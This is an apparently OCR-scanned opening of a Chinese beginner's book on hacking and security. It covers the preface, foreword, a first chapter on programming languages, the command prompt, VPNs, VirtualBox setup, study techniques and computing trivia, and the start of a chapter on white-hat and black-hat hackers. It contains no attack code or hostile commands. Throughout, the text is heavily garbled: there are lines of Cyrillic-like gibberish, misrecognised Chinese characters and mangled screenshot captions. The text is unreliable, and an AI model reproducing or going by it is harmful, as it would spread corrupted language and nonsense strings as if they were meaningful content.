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内 容 简 介 

这 是 一 本 专门 介绍 并 分 享 黑客 与 安全 技术 的 入 门 书 ， 内 容 从 基础 知识 出 发 ， 通 过 相关 实例 为 读者 剖 
析 计 算 机 安全 领域 的 各 种 技巧 。 

全 书 由 10 章 组 成 ， 第 1 章 主要 介绍 了 一 些 经 典 、 高 效 的 学 习 方 法 与 基本 技能 ;第 2 章 浅 析 了 当今 相 
天 技术 的 现状 与 基本 概念 ， 第 3 章 讲 解 通过 Web 渗透 测试 来 模拟 恶意 黑客 的 攻击 行为 ， 借 此 讲解 评估 计 
算 机 网 络 系统 的 安全 性 的 方法 ; 第 4 章 讲解 比 一 般 的 黑 盒 渗 透 测 试 更 直观 、 全 面 的 代码 审计 的 方法 与 相 
RAR: 第 5 章 从 基础 原理 开始 ， 详 细 介绍 了 无 线 安全 的 各 种 应 用 ; 第 6 章 从 HTML 基础 开始 ， 详 细 分 
析 了 XSS 等 前 端 漏洞 的 成 因 、 和 危害 以 及 防御 措施 ;第 7 章 深入 浅 出 地 探讨 了 社会 工程 学 这 条 黑客 与 安全 
技术 中 的 “ 奇 醒 ”; 第 8 章 通 过 对 多 种 相关 调试 工具 的 使 用 和 实例 分 析 ， 讲 解 逆 问 技术 与 软件 安全 的 相 
关 知 识 ; 第 9 章 通过 对 各 种 病毒 的 调试 分 析 ， 帮 助 读者 了 解 并 掌握 病毒 攻防 技术 及 相关 知识 ; 第 10 章 介 
绍 了 安全 领域 的 一 项 竞赛 一 一 CTF。 本 书 各 章 都 有 相应 的 练习 环节 ， 读 者 可 以 亲 目 动手 ， 以 便 更 好 地 理 
解 相 关 知 识 及 掌握 相关 技能 。 

本 书 适用 于 想 了 解 黑客 与 安全 技术 的 开发 人 员 、 运 维 人 员 以 及 对 相关 技术 感 兴趣 的 读者 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防 伪 标 签 ， 无 标签 者 不 得 销售 。 
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由 于 科技 不 断 发 展 ， 科 技 黑箱 〈 一 种 特殊 的 存储 、 传 播 和 交流 知识 的 设施 ) 的 出 现 也 
给 计算 机 发 展 珊 来 了 巨大 的 进步 ， 人 们 无 须 掌 握 全 部 知识 ， 只 须 按 照 步骤 去 学 习 和 操作 ， 
便 可 得 到 预期 的 结果 一 一 即便 你 并 不 知道 其 中 的 原理 是 什么 。 这 在 黑客 与 安全 方面 的 体现 
主要 有 两 点 ， 正 对 应 着 科技 黑箱 这 把 锋利 无 比 的 双 刃 剑 的 两 面 : 一 是 安全 技术 进步 迅速 ; 
二 是 恶意 黑客 攻击 变 得 更 加 频繁 。 

本 书面 癌 对 黑客 与 安全 体系 没有 全 面 了 解 的 开发 人 员 、 运 维 人 员 、 计 算 机 相关 专业 在 
校 学 生 ， 以 及 所 有 对 黑客 与 安全 技术 感 兴 趣 的 读者 。 安 全 事件 发 生 在 转瞬 之 间 ， 可 能 与 每 
个 人 奶奶 相关 。 如 果 人 们 没有 安全 意识 ， 或 是 对 恶意 黑客 攻击 一 无 所 知 ， 那 么 面 对 攻 击 ， 
只 剩 下 不 知 所 指 。 古 人 云 : 宜 未 雨 而 绸 纱 ， 考 临 淘 而 据 井 。 我 们 何不 通过 研究 黑客 攻击 的 
手段 寻找 防御 的 方法 呢 ? 

本 书 的 重点 内 容 ， 在 于 读者 将 在 书 中 看 到 各 种 各 样 的 攻击 手段 和 防御 措施 ， 编 者 尽 可 
能 地 将 理论 和 实践 联系 起 来 ， 以 便于 各 位 理解 。 

由 于 成 书 时 间 正 值 编 者 高 三 复习 ， 受 限于 阅历 和 精力 ， 所 以 书 中 难免 出 现 不 严谨 之 
处 ， 还 请 读者 不 音 指正 ， 编 者 也 会 第 一 时 间 在 https:/ mapers.net/ 上 进行 勘误 。 

同时 也 欢迎 读者 来 我 们 的 网 站 提问 交流 ， 我 们 将 不 断 更 新 原创 文章 ， 与 你 一 起 讨论 安 
全 热点 。 
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“时 维 九 月 ， 序 属 三 秋 ”。 傍 晚 ， 夜 色 如 酒 ， 天 气 微 深 ， 阴 十 和 乌云 党 单 的 天 空 ， 没 
有 雷鸣 麦 动 、 一 扫 阴 考 的 气势 ， 仿 佛 静 静 地 诉说 着 积 蕾 已 久 的 孤独 。 

这 份 神秘 的 气 县 ， 大 概 如 同 多 数 人 对 于 黑客 的 认识 一 一 暗淡 的 灯光 下 ， 一 个 背影 ， 
RRK, ПЖ ЕРЕН ЙЕЛІ, МАН ТЫНАН ЛХАС, АНАНЫ ЛА 
Ин, ТЕМЕН ЕВ НО ЕЕ ИОА. 

但 实际 上 上， 黑客 真 的 如 同 电影 中 描绘 的 与 人 们 想象 中 的 那样 吗 ? 

这 里 我 要 给 出 否定 的 答案 。 黑 客 无 处 不 在 ， 黑 客 之 所 以 如 此 神秘 ， 最 大 的 原因 是 人 们 
给 “黑客 ”这 个 词语 ， 以 及 一 切 与 黑客 相关 的 事物 ， 蒙 上 了 一 层 神秘 的 面纱 。 

那么 ， 到 底 什 么 才 是 黑客 ? 

“黑客 ”这 个 词 ， 其 实 最 初 曾 指 热衷 于 计算 机 技术 、 水 平 高 超 的 计算 机 专家 ， 尤 其 
是 程序 设计 人 员 。 现 在 ， 黑 客 们 活跃 在 安全 领域 的 一 线 ， 依 靠 看 敏锐 的 感知 ， 发 掘 、 研 究 
并 修复 各 种 漏洞 。 甚 至 可 以 这 样 说 : 没有 黑客 ， 计 算 机 安全 将 无 法 进步 。 黑 客 其 实 并 不 神 
秘 ， 也 并 不 可 怕 。 你 想 了 解 黑 客 吗 ? 想 通 过 学 习 黑 客 与 安全 知识 ， 去 化 解 来 自 计 算 机 的 恶 
意 攻击 吗 ? 那么 ， 本 书 值 得 一 读 。 在 这 条 路 上 你 也 许 会 遇 到 很 多 在 电影 中 才 遇 到 过 的 场景 
和 人 人物， 可 无 论 走 得 多 远 ， 也 请 务必 记 住 : 心 存 敬 上 其 ， 英 生 政 念 。5 引 用 谷歌 公司 一 句 不 成 
ХИН ле: Поп t be Evil. 

ИАН али, КРИШНА, АНЯ 
本 和 最 精炼 的 语言 ， 回 读者 朋友 们 呈现 一 个 精彩 的 、 属 于 黑客 的 神秘 技术 世界 。 

我 们 不 会 把 “以 提高 计算 机 领域 安全 水 平 为 目标 ”这 样 空洞 的 口号 挂 在 嘴 边 ， 学 习 
也 并 不 是 徘 嘴 说 说 就 行 。 我 们 要 做 的 ， 就 是 影响 正在 认真 阅读 本 书 的 读者 ， 传 达 正 确 的 观 
念 、 知 识 以 及 学 习 方法 ， 让 读者 更 深刻 地 了 解 黑客 ， 学 习 安 全 技术 ， 通 过 钻研 黑客 与 安全 
技术 ， 从 而 在 计算 机 世界 中 更 好 地 保护 目 己 。 

本 书 共 10 章 ， 各 个 章节 独立 却 又 相互 关联 ， 知 识 点 之 间 也 有 相互 影响 的 地 方 ， 虽 然 每 
章 之 间 的 关联 性 不 是 那么 强 ， 不 过 在 内 容 安排 上 是 按照 由 浅 入 深 设 计 。 作 为 一 本 黑客 与 安 
全 技术 的 局 蒙 书 ， 我 们 尽量 照顾 初学 者 ， 但 仍然 有 很 多 基础 知识 需要 新 手 朋 友 们 目 己 去 钻 
ІШ, Ен, Но ІШЕ” МЕНЕ ЕНЕ ЗЕН), ME? 
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由 于 信息 技术 的 更 新 友 代 速度 十 分 怀 人 人， 时效 性 较 强 ， 所 以 我 们 拟 建 mapers.net 和 社区 
以 供 读者 朋友 们 交流 ， 斋 望 可 以 在 计算 机 安全 的 道路 上 助 读者 一 臂 之 力 。 


ш 本 书 适 合 的 人 : 


> 认真 的 人 ; 
> 愿意 花 时 间 钻 研 知 识 而 不 是 沉迷 于 游戏 的 人 ; 
> 善于 遇 到 问题 先 独立 寻找 答案 的 人 。 


ш 与 本 书 无 缘 的 人 : 


> ЖИА; 

> 布 望 速成 的 人 ; 

> 仅仅 是 觉得 黑客 很 酷 而 决定 学 习 黑 客 技术 的 人 ; 
> 抱 着 不 良 目 的 的 人 。 
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本 章 作为 全 书 第 1 章 ， 将 会 介绍 一 些 基础 知识 和 经 典 的 学 习 方 法 。 方 法 与 技能 有 无 数 
种 ,希望 读者 朋友 们 能 增强 独立 思考 能 力 ， 目 己 总 结 规律 ， 在 互联 网 上 寻找 书 中 没有 提 到 
的 知识 ， 这 样 才 能 更 好 地 向 握 知 识 技 能 。 


1.1.1 编程 基础 


编程 在 计算 机 领域 称 得 上 是 必 备 拉 能 了 ， 在 此 我 们 不 再 探讨 各 种 语言 的 优 缺 点 ， 也 不 
介绍 类 似 ““ 面 同 对 象 ” 和 “面向 过 程 ” 之 间 区 别 ” 的 问题 ， 更 不 会 空谈 编译 原理 等 问 
题 ， 这 里 将 人 简单 介绍 一 些 适 合 新 手 入 门 学 习 的 编程 语言 以 及 书 中 涉及 的 各 种 技术 所 需 的 编 


程 语言 。 
1. Python 


Python 是 一 种 解释 性 脚本 语言 ， 它 拥有 众多 的 “ 库 ”。Python 功 能 强大 而 且 简洁 ， 还 
可 以 将 其 他 语言 的 模块 轻松 联结 起 来 ， 故 又 被 称 为 “胶水 语言 ”。 由 于 Python 需要 的 代码 
量 极 少 且 易于 学 习 ， 其 程序 源 代 码 对 于 使 用 者 完全 开放 ， 在 开源 软件 工作 者 和 编程 初学 者 
中 具有 极 好 的 声誉 。 学 习 Python 对 人 们 日 后 的 网 络 编程 学 习 ， 以 及 Web 渗 透 中 部 分 工具 的 
使 用 具有 重要 意义 。 

目前 Python 主要 分 为 2.X 与 3.x 两 个 版 本 ， 两 者 在 语法 上 略 有 差异 ， 且 各 有 优 缺 点 ， 大 
家 可 以 根据 目 己 的 需求 学 习 不 同 的 版 本 。 


2 CZE 


C 语 言 是 一 种 极其 重要 和 流行 的 编程 语言 ， 具 有 极 高 的 可 移植 性 同样 的 代码 在 
Linux. Windows. Мас OS 系统 上 都 可 以 运行 ， 它 的 运行 速度 极 快 ， 可 以 充分 利用 计算 机 
的 优点 ， 表 现 出 只 有 汇编 语言 才 具 有 的 精细 控制 能 力 。 对 于 初学 者 来 说 ，C 语 言 是 最 容易 上 
手 的 一 门 “大 型 ”编程 语言 ，C 语 言 也 与 后 面 涉及 到 的 病毒 分 机 和 逆 回 技巧 有 重要 联系 。 


3. 汇编 语言 

汇编 语言 是 计算 机 的 底层 语言 ， 大 部 分 计算 机 的 汇编 语言 基于 X86 指 令 集 ， 计 算 机 可 
通过 汇编 程序 将 汇编 代码 转化 为 机 器 码 一 一 计算 机 可 以 直接 执行 的 代码 。 汇 编 可 以 使 人 们 
更 清晰 地 了 解 计 算 机 的 运行 原理 ， 同 时 也 对 在 接 下 来 的 章节 中 要 中 学 习 的 软件 漏洞 分 析 、 
道 回 分 析 以 及 病毒 机 制 的 理解 具有 重要 意义 。 


4. JavaScript 
JavaScript 是 一 种 脚本 语言 ， 在 Web 前 端 中 担任 看 重要 的 角色 ， 但 它 也 是 造成 XSS (9 
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站 脚本 攻击 ) 、CSRE 等 漏洞 的 菲 魁 祸首 之 一 ， 所 以 说 JavaScript 是 学 习 渗 透 测 试 和 前 疹 安 
全 的 一 门 必修 谍 。 


1.1.2 命令 提示 符 


命令 提示 符 在 许多 人 印象 里 就 是 一 个 “黑洞 洞 的 窗口 ” (其实 cmd 窗 口 也 是 可 以 美化 
的 ， 例 如 图 1-1 被 笔者 设置 成 透明 色 ， 毕 竞 如 果 长 时 间 使 用 终端 工作 ， 一 个 赏心悦目 的 界 
面 还 是 很 有 必要 的 ) 。 在 Windows 系 统 中 ， 按 Win 十 R 键 ， 输 入 cmd 并 回 车 ， 就 可 以 调 出 
cmd 窗 口 。 


图 1-1 笔者 的 cmd 命 令 提示 符 界面 

许多 应 用 在 命令 提示 符 窗 口 进 行 操作 会 更 加 人 简洁， 比如 输入 Python 可 以 局 动 Python 解 
释 器 《前 提 是 已 搭建 了 Python 环境 ) ， 学 会 命令 提示 符 的 常用 用 法 和 语法 后 ， 可 以 写 出 批 
处 理 〈*.bat) 文件 ， 来 进行 许多 原始 而 又 简单 的 操作 。 

类 似 地 ，Linux 系 统 的 Shel 则 是 Linux 的 命令 提示 符 ， 称 为 命令 行 ， 一 般 以 终端 方式 打 
开 。 俗 话说 尺 有 所 短 ， 寸 有 所 长 ，Linux 的 图 形 化 界面 虽然 没有 Windows 易 用 ， 但 是 它 在 
命令 行 方面 比 Windows 更 加 成 熟 ， 读 者 可 以 尝试 Linux 的 一 些 发 行 版 ， 例 如 Ubuntu、Debian 
和 等， 熟悉 Linux 系 统 对 于 提升 工作 效率 是 大 有 神 益 的 。 


1.1.3 虚拟 专用 网 络 


虚拟 专用 网 络 ， 这 个 名 词 可 能 令 部 分 谈 者 感到 些许 陌生 ， 但 它 的 英文 名 称 读者 一 定 听 
X$, Virtual Private Network， 即 VPN。VPN 能 够 让 其 他 人 连接 到 企业 网 络 或 内 部 网 络 ， 通 
过 一 个 公用 网 络 建立 一 个 临时 的 、 安 全 的 连接 ， 这 是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 
定 的 隧道 。 同 时 VPN 能 提供 高 水 平 的 安全 性 ， 使 用 高 级 的 加 密 和 身份 识别 协议 保护 数据 ， 
阻止 没有 被 授权 的 用 户 接 触 数 据 。 而 在 渗透 测试 中 ， 使 用 VPN 则 可 以 进入 一 些 无 法 正常 访 
问 的 网 络 环 境 ， 从 而 进一步 开展 渗透 测试 。 


1.1.4 虚拟 机 


虚拟 机 (Virtual Machine) 指 通过 软件 模拟 具有 完整 便 件 系统 功能 的 、 运 行 在 一 个 完 
全 隔离 环境 中 的 完整 计算 机 系统 。 
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简单 来 说 ， 虚 拟 机 就 是 操作 系统 中 的 一 个 沙 盒 ， 在 沙 盒 之 中 执行 操作 的 时 候 主 系统 是 
不 会 干扰 到 外 部 系统 的 ， 可 以 说 是 安全 测试 中 必 不 可 少 的 工具 。 

从 20 世 纪 五 六 十 年 代 IBM 提 出 虚拟 机 技术 开始 ， 虚 拟 机 技术 随 看 互联 网 的 发 展 ， Н 
益 成 熟 。 目 前 ， 比 较 流 行 的 虚拟 机 软件 有 VMware、VirtualBox 和 Virtual PC， 它 们 都 能 在 
Windows 系 统 中 虚拟 出 多 个 计算 机 系统 。 当 需要 在 其 他 系统 环境 测试 软件 或 以 另 一 个 系统 
作 辑 机 来 测试 茶 漏洞 时 ， 则 可 以 在 目 己 的 同一 台 计 算 机 上 安装 两 个 或 多 个 操作 系统 ， 例 如 
可 以 同时 安装 Linux 与 Windows 操 作 系 统 ， 并 且 在 虚拟 机 与 物理 机 之 间 共 享 文件 、 应 用 程 
序 及 网 络 资源 等 ， 这 将 极 大 地 提高 工作 效率 。 

接 下 来 ， 我 们 以 VirtualBox 软 件 为 例 来 介绍 一 下 虚拟 机 的 安装 方法 。 

VirtualBox 是 一 和 葡 利 用 的 开源 的 虚拟 机 软件 ， 它 具有 操作 简便 、 界 面 简 洁 等 很 多 优 
点 。 图 1-2 是 在 Windows 环境 下 运行 VirtualBox 的 界面 。 


% Oracle ММ VirtualBox 管理 器 = ча 
вер тым) ВИН) 
ра? D д 
ИЕ) Ш) РЕ) 清除 
”| 欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 记过 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因为 未 了 没有 新 逮 任 何 庶 拟 电脑 . 
要 新 建 一 个 虚拟 电脑 ， 请 按 位 于 窗口 顶部 工具 栏 上 的 ЖЖ ЗЫ. 2 q 


你 可 以 扩 ті ЖЕНЕВА), ПИШ vwe. box. org 查看 最 "р 
Зп Япет] 


国 СЕНЕ) 


SS 


е”, 


в. 


1-2 VirtualBox} R E 
单 击 “新 建 ” 按 钮 ， 会 弹出 如 图 1-3 所 示 的 界面 ， 这 里 需要 键入 虚拟 机 的 名 称 以 及 选 
择 所 安装 系统 的 类 型 和 版 本 。 
之 后 ， 单 击 “ 下 一 步 ” 按 钮 进入 内 存 分 配 界面 ， 如 图 1-4 所 示 。 在 安装 每 一 个 虚拟 系 
统 的 时 候 ， 都 要 为 其 分 配 相 应 大 小 的 内 存 ， 这 些 内 存 用 以 文 持 虚拟 系统 的 运行 及 虚拟 系统 


中 程序 的 运行 。 
? ? 
е) ”新 建 虚拟 电脑 (©) ее 
虚拟 电脑 名 称 和 系统 类 型 内 存 大 小 
请 选择 新 虚拟 电脑 的 指 述 名 称 及 要 安装 的 操作 系统 类 型。 选择 分 配给 虚拟 电脑 的 内 存 大 小 0B) о 


此 名 称 将 用 十 标识 此 虚拟 电脑 


жапа): 建议 的 内 存 大 小 为 192 мв 
а“ 


U 256 [H| ив 
ЖЕЦТ): Microsoft Vindows ~ ET: ККЕ Т 
ВИ (ү): Windows ХР (32 bit) ЕЯ 4 в 4096 ИВ 
тво 
图 1-3 ”为 虚拟 机 命名 并 选择 镜像 的 系统 类 型 与 版 本 图 1-4 为 虚拟 机 分 配 内 存 


虚拟 机 系统 为 Windows XP 时 ， 为 其 分 配 256M 的 运行 内 存 足 够 支持 虚拟 机 中 的 常用 操 
作 。 当 然 ， 所 能 分 配 的 最 大 内 存 不 能 超过 物理 机 内 存 的 剩余 部 分 ， 毕 竞 虚 拟 机 内 存 是 无 法 
凭空 虚拟 的 。 


除了 分 配 内 存 ， 还 要 给 虚拟 系统 分 配 人 硬盘。 硬盘 是 一 个 载体 ， 如 同 主 系统 安装 在 主机 
的 硬盘 上 一 样 ， 我 们 要 给 所 安装 的 虚拟 系统 分 配 一 块 虚拟 人 硬盘。 分 配 硬盘 有 两 种 方式 ， 
种 是 固定 大 小 ， 另 一 种 是 动态 分 配 ， 如 图 1-5 所 示 。 

顾名思义 ， 动 态 分 布 模式 下 ， 给 虚拟 系统 分 配 的 人 硬盘 空间 会 随 看 虚拟 系统 的 增 大 而 增 
大 ， 在 该 模式 下 ， 新 建 硬盘 很 快 ， 而 且 不 需要 消耗 太 大 空间 ， 分 配给 虚拟 系统 的 硬盘 大 小 
会 随 看 逐渐 使 用 而 增加 。 

而 固定 大 小 模式 ， 则 是 为 虚拟 系统 分 配 固定 的 空间 ， 在 空间 足够 时 ， 虚 拟 系统 可 以 流 
畅 地 运行 ， 如 果 虚 拟 系统 所 占 的 空间 大 于 或 等 于 所 分 配 的 硬盘 内 存 ， 则 会 出 现 错误 。 如 图 
1-6 所 示 ，VirtualBox 软 件 会 根据 所 选择 的 系统 类 型 默认 一 个 人 硬盘 大 小 ， 可 供 参 考 。 


? ЕШ ? > 
(=) ввеква (=) ввеква 
存储 在 物理 硬盘 上 文 忻 习 置 和 大 小 
ах иг ый 为 其 使 用 而 分 配 ( 动 态 分 加 T Е ЛЕА, ЩЕ ЕА 
ЕНЕ ОСЕ АИ Иа a ал 

动态 分 本 的 и а Е (зі Е а 
са Ера р 2 ВЕБ ВЕЕР 
йен E] пари RENKA- = ШЕ ЕИ ЕСЕТА hA 
ЕРА ҺЕ У (ТАТЕ ВОН Тара Е ТР ВСУ ВЕР! 
я, 但 它 往 和 福 使 用 起 来 较 快 > | | 10.00 68 

бі 1 4.00 НЕ 2.00 ТВ 

бой 

(ғы || юн | @# || ви 
图 1-5 为 虚拟 机 设置 虚拟 硬盘 类 型 图 1-6 为 虚拟 硬盘 命名 并 分 配 大 小 


单 击 “ 创 建 ” 按 钮 ， 我 们 可 以 看 到 创建 过 程 ， 如 图 1-7 所 示 。 


$ 创建 虚拟 硬盘 : Creating fixed medium storage unit 'C:\Users\yy\VirtualB... 


Creating fixed medium storage unit `C: \Wsers\yy\VirtualBox УМз\хр\хр. 41°... 


== 14% X 
剩余 时 间 : 17 #0 


图 1-7 创建 虚拟 硬盘 
全 此 ， 我 们 的 虚拟 硬盘 就 建立 完毕 了 。 之 后 在 VirtualBox 的 主 界面 可 以 看 到 左 侧 的 管 
理 列表 出 现 了 刚刚 创建 的 虚拟 系统 。 单 击 选 中 左 侧 的 系统 ， 单 击 局 动 栏 上 的 “启动 ” 按 
钮 ， 便 可 以 进入 创建 的 虚拟 系统 中 ， 如 图 1-8 所 示 。 
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图 1-8 ”开启 虚拟 机 
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在 刚才 的 操作 之 中 ， 我 们 在 VirtualBox 中 创建 了 一 个 “空位 ”， 接 下 来 就 可 以 通过 镜 
像 文 件 来 安装 系统 了 人 ， 相 信 读 者 都 熟知 ， 这 里 不 再 次 述 。 


1.2 ВС ЛИ: 


在 简单 熟悉 了 一 些 基 本 知识 后 ， 让 我 们 来 看 一 些 在 计算 机 领域 十 分 实用 的 学 习 方 法 。 
局 效 的 学 习 方 法 可 以 帮助 我 们 节省 时 间 和 精力 ， 有 的 思维 方式 其 至 能 帮助 我 们 突破 思 
维 柳 锁 ， 所 以 ， 学 习 一 些 学 习 方法 是 十 分 必要 的 。 


1.2.1 思维 导 图 


思维 导 图 (Mind Manager) ， 又 称心 智 图 ， 是 一 种 表达 发 散 性 思维 的 有 效 的 图 形 思 维 
工具 。 它 的 创始 人 东 尼 。，。 博 赞 (Tony Buzan) 拥有 “全 世界 最 高 创造 力 IQ” 的 头衔 。 思 维 
导 图 有 利于 人 脑 的 扩散 思维 的 展开 ， 有 影响 力 极 大 ， 新 加 坡 甚至 将 思维 导 图 列 为 小 学 必修 科 
目 ， 大 量 著 名 大 型 企业 也 逐渐 开始 使 用 思维 导 图 。 

思维 导 图 所 运用 的 方法 是 一 种 将 发 散 性 思维 具体 化 的 方法 ， 它 提供 一 个 关键 点 ， 即 父 
节点 ， 然 后 发 散 出 任意 多 个 子 节点 ， 这 些 节点 又 可 以 与 其 他 节点 相连 ， 形 成 可 视 化 记忆 结 
构 ， 在 管理 大 型 项 目 或 渗透 测试 等 需要 全 局 掌控 的 环境 下 非常 实用 。 图 1-9 是 一 个 项 目 计 
划 的 思维 导 图 雏形 。 
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图 1-9 ”一 个 项 目 计划 的 思维 导 图 雏形 
绘制 思维 导 图 的 软件 有 很 多 ， 各 种 平台 均 有 丰富 的 软件 可 供 选 择 ， 当 然 ， 在 白板 或 车 
稿 纸 上 也 可 以 很 好 地 展现 思维 导 图 。 
1.2.2 SkF EFA 


所 谓 曼 陀 罗 思考 法 ， 与 上 文 的 思维 导 图 一 样 ， 是 一 种 能 够 开发 创意 、 发 现 问题 、 提 高 
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效率 的 思维 方式 ， 它 主要 应 用 于 制作 备 坏 录 与 理 清 思路 。 
一 般 的 曼 陀 罗 思 考 法 笔记 分 为 9 个 区 域 ， 它 的 特点 是 让 
人 依托 惯性 思维 和 下 线 思维 ， 在 曼 陀 罗 笔 记 的 视觉 影响 下 ， 
人 们 会 从 各 个 方面 对 主题 进行 思考 ， 此 时 潜意识 会 被 激发 ， 
灵感 会 比 平时 更 容易 被 大 脑 捕捉 。 图 1-10 为 一 个 简单 的 曼 陀 
罗 笔 记 格式 ， 相 信和 你 看 一 过 就 能 在 纸 上 还 原 它 了 。 
вен “илл” м “5” р 
使 用 方法 ， 它 们 都 是 从 最 中 间 的 一 点 开始 ， 思 考 “5W” 1-10 一 个 简单 的 曼 陀 罗 笔 记 
(Who、What、Why、Where 和 When) ， 这 在 逻辑 编程 和 信息 搜集 中 有 奇效 。 


1.2.3 番茄 工作 法 


ли ГЕТЕ (The Pomodoro Technique) ， 是 一 种 时 间 管 理 方法 ， 由 弗朗西斯 科 。 西 
E% (Francesco Cirillo) 于 1992 年 创立 ， 这 种 方法 的 规则 大 致 如 下 。 

(1) 记录 要 完成 的 任务 ， 写 在 纸 上 或 记录 在 你 的 电子 设备 中 。 

(2) 每 4 个 番茄 钟 为 一 组 ， 每 组 30 分 钟 ，30 分 钟 内 专注 于 一 项 工作 ， 不 允许 做 任何 无 
关 的 事 并 目 行 安排 最 后 几 分 钟 休息 ， 每 4 个 番茄 钟 安排 15$ 一 30 分 钟 体 悬 时间。 

(3) 番茄 钟 不 可 以 分 割 。 

(4) 在 该 番茄 钟 完 成 时 ， 画 一 个 X， 大 由 于 不 可 抗力 或 人 为 因素 放弃 了 该 番 驰 钟 
(哪怕 还 剩 1 分 钟 就 结束 了 )〉， 都 不 能 男 X， 这 个 番 训 钟 应 该 算 没 有 存在 过 。 

(5) 休息 时 间 不 要 用 番 闸 来 规定 。 

(6) 根据 目 身 调整 方法 。 

利用 这 种 高 专注 的 工作 学习) 方法 ， 我 们 不 必 再 为 时 间 担 心 ，“ 几 小 时 一 晃 而 过 却 
什么 也 没 干 ”的 情况 不 会 再 出 现 ， 长 期 坚持 还 能 大 幅度 地 提高 集中 力 和 注意 力 ， 增 强 决策 
意识 、 大 局 观 与 决断 力 。 另 外 ， 当 一 个 个 番茄 钟 被 完成 时 ， 你 会 发 现 有 一 种 独特 的 目 紧 感 。 

管理 番茄 钟 的 软件 在 网 络 上 有 各 种 各 样 ， 也 几乎 全 平台 支持， 读者 可 以 根据 目 己 的 需 
求 ， 选 择 适 合 目 己 的 番茄 钟 管 理 软件 ， 如 果 你 有 兴趣 ， 不 妨 尝试 一 下 用 目 己 拿手 的 编程 语 


言 写 一 个 番茄 钟 软件 。 
1.3 关于 “р” 


本 节 介 绍 一 些 “ 看 似 奇 怪 ” 的 小 知识 ， 可 能 谈 者 有 所 耳闻 ， 一 起 来 看 看 这 些 开 玩 突 的 
话 中 都 旨 藏 痢 哪些 计算 机 技术 。 


1. PHP 是 最 好 的 语言 


“PHP 是 最 好 的 语言 ”这 个 梗 ， 出 自 PHP 语 言 的 函数 名 ， 虽 然 现 在 使 用 PHP 做 开发 的 
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人 较 多 ， 用 PHP 语 言 开 发 的 网 站 也 数不胜数 ， 但 从 本 质 上 来 看 ，PHP 在 有 些 方面 十 分 令 人 
费解 ， 比 如 PHP 的 核心 函数 命名 规则 很 不 一 致 ， 有 “strptitme” 这 样 的 类 C 函数 的 名 字 ， 
A “xml set ежегпа| епшу гей handler” 这 样 十 分 长 却 规范 的 命名 ， 还 有 “nl2br” 这 样 的 
简写 方式 命名 ， 也 有 “stripcslashes” 这 样 奇 怪 的 长 名 。 后 来 有 人 发 现 ， 当 РНР 还 是 只 有 
不 到 100 个 函数 的 小 型 语言 的 时 候 ， 其 作者 决定 用 函数 名 的 字符 数量 来 作为 函数 的 hash, 
由 于 这 个 “神奇 ”的 决定 ，PHP НА АКА ИА n] Bë КНК. Вт, ХРТ 


也 一 直 持续 至 今 。 
2 “+ Fr УЕ” “2010109” “HHH” 5 ЕЕ” 
先 来 看 一 自 小 证: 
УЛ, 
D P k "$ Я 0 Я. 
Во Ф, фф, 
笑 看 万 物 错 错 错 。 


这 首 诗 可 能 怪异 、 令 人 费解 ， 从 技术 层面 讲 ， 它 的 含义 如 下 。 

EME: 这 是 一 个 GBK 字 符 集 和 Unicode 字 符 集 之 间 的 转换 问题 ， 有 一 些 字 
符 用 Unicode 无 法 表示 ，Unicode 就 会 用 一 个 占 位 符 来 表示 这 些 文字 ， 即 “U+FFFD 
REPLACEMENT CHARACTER”。 那 么 U+FFFD 用 UTF-8 编 码 出 来 ， 多 次 重复 ， 然 后 放 
到 GBK 等 环境 中 显示 的 话 ， 一 个 汉字 2 个 字 节 ， 最 终 的 结果 就 是 : М COxEFBF) , JT 
(OxBDEF) , 3% (0xBFBD) 。 

锟 斤 拷 也 曾 出 现在 新 闻 中 : 


神舟 十 号 11 日 17 时 38 分 发 射 ， 三 位 航天 员 公 布 链 接 指向 神奇 的 “ 锟 斤 找 锟 斤 找 锟 2 ， 
85157, ЖЯ ЕФ. 


ARA” “іші” 5 И”: ОЕ ТН БҮ, ЖаН И 
в, Хънт ева т Ео, ЖЛ ИЗЭИЛЛТЕШ ИТ, Жанет е KEE, MAFRA 
员 申 请 的 内 存 后 面 经 常 被 填充 为 “CCCCCCC…”， 这 样 输出 结果 就 成 了 著名 的 “ 溪 
а” А 


1.4 Жал 


本 章 主 要 介绍 了 一 些 编程 语言 、 虚 拟 机 的 安装 及 一 些 学 习 方式 等 ， 作 为 网 络 安全 技术 
的 基础 ， 这 里 有 必要 做 简单 介绍 。 相 信 通 过 后 面 章 节 的 学 习 ， 读 者 会 对 各 个 方向 有 更 清晰 
的 认 知 。 


EN 黑客 与 安全 技术 指南 


21 АТ ЗАМ ЛЕЛЕР 


正如 前 言 所 说 ， 很 多 人 认为 “黑客 ”这 个 词 具有 贬义 ， 实 际 上 黑客 却 在 推动 计算 机 不 
断 进 步 方面 功 不 可 没 ， 黑 客 与 安全 技术 密 不 可 分 。 如 果 好 坏 善 恶 需 要 明确 的 词语 来 划分 的 
话 ， 那 么 善意 的 黑客 我 们 称 为 白 帆 黑客 ,恶意 的 黑客 则 被 称 为 黑 帽 黑客。 俗话 说 “攻防 不 
绝对 ， 技 术 无 黑白 ”， 好 坏 要 看 使 用 者 目 喘 。 

放眼 当下 ， 大 多 数 人 对 黑客 的 认识 还 停留 在 “破坏 ”与 “入 侵 ” 等 词汇 上 ， 造 成 这 种 
现象 的 原因 ， 一 方面 ， 大 众 往往 无 法 直接 接触 黑客 群体 ， 仅 在 影视 作品 中 了 解 过 黑客 ， 殊 
不 知 ， 影 视 作 品 多 有 稚 张 成 分 。 另 一 方面 ， 新 闻 媒 体 对 黑客 的 报道 也 略 有 偶 颇 ， 例 如 近期 
新 闻 “ 中 国 年 龄 最 小 的 黑客 ，13 岁 时 ， 入 侵 学 校 的 在 线 答题 系统 ， 只 为 不 做 作业 ， 利 用 黑 
客 “ 抓 包 技术 ” 花 1 分 钱 买 了 2500 元 的 东西 ……” 实 际 上 ， 这 位 “小 黑客 ”本 人 也 表示 ， 
这 是 对 他 的 误 读 ， 新 闻 内 容 实 在 是 夺 张 至 极 ， 充 斥 看 添 油 加 酯 之 后 用 以 吸引 眼球 的 文学 。 
更 有 其 者 ， 还 出 现 过 “小 学 三 年 级 会 破解 计算 机 密码 ， 资 取信 用 卡 赚 取 15 亿 ”这 种 夸张 的 
标题 ， 实 际 情况 如 何 ， 各 位 读者 心中 ， 应 该 都 有 一 面 明镜 。 
